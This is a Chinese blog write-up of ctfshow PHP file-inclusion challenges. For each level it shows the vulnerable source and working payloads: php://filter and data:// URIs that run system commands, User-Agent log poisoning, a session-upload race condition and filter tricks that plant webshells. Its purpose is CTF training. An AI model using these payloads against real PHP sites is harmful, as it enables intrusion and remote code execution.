ctfshow 文件包含

最新推荐文章于 2024-05-22 18:36:50 发布
最新推荐文章于 2024-05-22 18:36:50 发布
阅读量230 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74097148/article/details/129674250
版权

web78

查看源码,发现用了include包含文件,没有任何过滤

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

payload:

?file=php://filter/read=convert.base64-encode/resource=flag.php

web79

查看源码,发现对php进行了过滤,采用data协议,进行base64编码

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

payload:

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdscyAnKTs/Pg==
//编码处是 <?php system("ls ");?>   回显flag.php,index.php

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==
//编码处是 <?php system("cat flag.php");?>

web80

查看源码,在上题基础上又把data过滤了

这里采用包含日志文件绕过,通过User-Agent头部注入命令:

payload:

?file=/var/log/nginx/access.log
//ua头:<? php system('ls');?>     -> <? php system('cat fl0g.php');?>

 

 web81

跟上一个题一样,记得bp点击send时候,点击两下

web82-86

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

 这题又过滤了   .  ,日志包含的方法就不能用了(access.log)

参考:

利用session对话进行文件包含利用原理

利用PHP_SESSION_UPLOAD_PROGRESS进行文件包含

浅浅总结一下:

session还有一个默认选项,session.use_strict_mode默认值为0。此时用户是可以自己定义Session ID的。比如,我们在Cookie里设置PHPSESSID=TGAO,PHP将会在服务器上创建一个文件:/tmp/sess_TGAO”。即使此时用户没有初始化Session,PHP也会自动初始化Session。

问题来了,默认配置session.upload_progress.cleanup = on导致文件上传后,session文件内容立即清空

用户是可以自己定义Session ID的。比如,我们在Cookie里设置PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag”。即使此时用户没有初始化Session,PHP也会自动初始化Session,并产生一个键值.

对于第一点,正好它生成的临时文件里用的是_,可以将想要执行的命令<?php system('ls');?>写入这个文件;
但是,再看第二点,文件上传后,生成的临时文件会立即清空,也就是说以我们的速度是不可能读取的到,那么,就需要借助条件竞争了。

条件竞争:假设攻击者上传了一个用来生成恶意shell的文件,在上传完成和安全检查完成并删除它的间隙,攻击者通过不断地发起访问请求的方法访问了该文件,该文件就会被执行,并且在服务器上生成一个恶意shell的文件。至此,该文件的任务就已全部完成,至于后面发现它是一个不安全的文件并把它删除的问题都已经不重要了,因为攻击者已经成功的在服务器中植入了一个shell文件,后续的一切就都不是问题了。

文件上传前端代码:

<!DOCTYPE html>
<html>
<body>
<form action="自己容器的域名(your-domain)" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
</form>
</body>
</html>

创建一个1.html,写入上面的代码

搭建本地环境,进入1.html,上传的文件随意

使用bp抓包

在cookie处添加:PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag

123处为了方便爆破

 在抓包题目容器的包

 下面是条件竞争的一般设置,数字够大就行

 两个包同时放包,为了方便可将ls直接改为fl0g.php进行竞争,得到flag

web87

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);

    
}else{
    highlight_file(__FILE__);
}

这题因为file_put_contents()函数会在输入的file中写入<?php die('大佬别秀了');?>,所以一旦写入,那么当前执行的脚本就会立即结束,只有想办法让写入的die函数不被执行而当作字符串,就能成功包含文件。 

参考p神的谈一谈php://filter的妙用

这里用base64绕过,思路:我们用php://filter/write=convert.base64-decode对传入的字符进行一次解码,由于<|>|?|(|)|等字符是不在这64个字符中的,会被忽略,最终<?php die('大佬别秀了');?>只剩phpdie,而phpdie是七个字节,base64解码是以四个字节为一组,我们在之前随意添加2个字符:aa,组成八个字节,这样正常解码后,该die代码便没有了

?file=php://filter/write=convert.base64-decode/resource=1.php  //创建一个待写入的文件
//记得进行url两次编码

post传参:a+经过base64编码的(<?php system('tac f*.php');?>))

?file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30
content=aaPD9waHAgc3lzdGVtKCd0YWMgZioucGhwJyk7Pz4K

之后访问1.php

web88

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

发现过滤了很多东西,但没有过滤冒号,这里只有data协议可以较为轻松地绕过

paylaod:

?file=data://text/plain;base64,<?php system('tac *.php');?>
//PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/Pgo=  编码后会有等号(被过滤)

去掉后面的等号即可

//PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/Pgo

web116

下载文件,foremost分离得出png文件。

虽然代码过滤了很多过滤器,但用的是file_get_contents,直接传参?file=flag.php,用bp抓包访问即可得到flag

 web117

新姿势,参考:CTFshow——web入门——文件包含_ctfshow web入门 文件包含_一风起致的博客-CSDN博客

file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php


contents里的内容通过write这个过滤器采用convert.iconv.UCS-2LE.UCS-2BE这个方式进行过滤,把<?php die();?>这个代码进行过滤扰乱,从而实现绕过


注: convert.iconv.UCS-2LE.UCS-2BE这个是将前后两个字符进行交替(abcd==>badc)

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=1.php
POST contents=?<hp pvela$(P_SO[T]1;)>?

访问1.php,进行post传参,1=system('tac flag.php');

hybcx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTFshow-文件包含
qq_61376069的博客
01-19 250
CTFshow入门——文件包含
ctfshow文件包含
Vincent0sen的博客
11-13 1185
解法一 - php://input解法二 - data://
CTFshow元旦水友赛-web-easy include
最新发布
jwkaaaaaa的博客
05-22 433
CTF元旦水友赛-web-easy include wp
CTFshow web 文件包含
m0_56993542的博客
10-18 385
web 78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 文件包含伪协议,没有过滤。 ?file=php://filter/read=convert.base64-encode/resource=flag.php 拿到flag的base64编码,直接去解码。 web 79 if(isset($_GET['file'])){
CTFshow刷题日记-WEB-文件包含
Love&Share
09-04 4169
文件包含专题 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 依旧是代码审计类型 直接伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php ?file=data://text/plain,<?php system("nl flag.php");
ctfshow-web79(文件包含)
m0_62094846的博客
01-11 564
if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__); } 过滤了php,如果用上题的php://file怎么都解不开,可以使用data ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQg.
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
Web安全主要关注Web应用中的漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件...
隐写_Jphswin_ctfshow.rar
08-26
这个压缩包文件“隐写_Jphswin_ctfshow.rar”显然包含了这个工具的可执行文件,很可能用于参加类似于CTF(Capture The Flag)的信息安全竞赛或挑战。 Jphswin是一个基于JPEG图片的隐写工具,它利用JPEG文件格式的...
PHP特性(网友根据ctfshow整理)1
08-03
在处理文件路径时,PHP有时会允许相对路径或者伪协议(如`file://`)的使用,这可能引发安全风险,如文件包含漏洞。开发者应当谨慎处理文件路径,避免潜在的安全问题。 3. **三目运算符`?:`的理解与变量覆盖**: ...
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
CTFShow-周末大挑战parse-url篇Writeup
05-19
这些关卡展示了URL解析漏洞的多种利用方式,包括命令注入、数据编码绕过过滤、多语言代码执行等。防范这些攻击的关键在于对用户输入进行严格的验证和过滤,避免将不受信任的数据直接传递给解释器执行。开发者应遵循...
CTFshow 文件包含 web116
Kradress的博客
12-12 785
目录源码思路题解总结 源码 下载视频用winhex分离出png 思路 可以正常读文件 题解 直接跑字典 总结 水题
ctfshow文件包含-超详解
qq_50589021的博客
08-05 1924
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
ctfshow-文件包含
m0_74456293的博客
03-27 532
ctfshow-文件包含
CTFSHOW PHP特性篇(中篇 111-131)
羽的博客
10-21 4717
web111 function getFlag(&$v1,&$v2){ eval("$$v1 = &$$v2;"); var_dump($$v1); } if(isset($_GET['v1']) && isset($_GET['v2'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*
php特性(持续更新)
weixin_74427106的博客
03-29 269
它让我们不要输出数字,还需要让num为数字,但看到intval 我们就需要敏感;intval函数还有这一特点:intval处理一个数组对象时,会返回1;php特性一些函数的使用。先分析一下这个php代码。一下两个函数官方的解释。
基于CTFshow的web4下的文件包含学习
Cyber Striver的博客
09-26 1383
基于CTFshow的web4下的文件包含学习。还涉及ctfhub的文件包含题解。
ctfshow web入门 文件包含
Lum1n0us's Blog
02-03 856
文章目录web78web79web80-81web82-86web87web88web116web117参考链接 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 第一题是最基础的文件包含,直接上payload payload: ?file=php://filter/convert.base64-enco
CTFshow 文件包含 web88
Kradress的博客
12-12 757
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-17 02:27:25 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值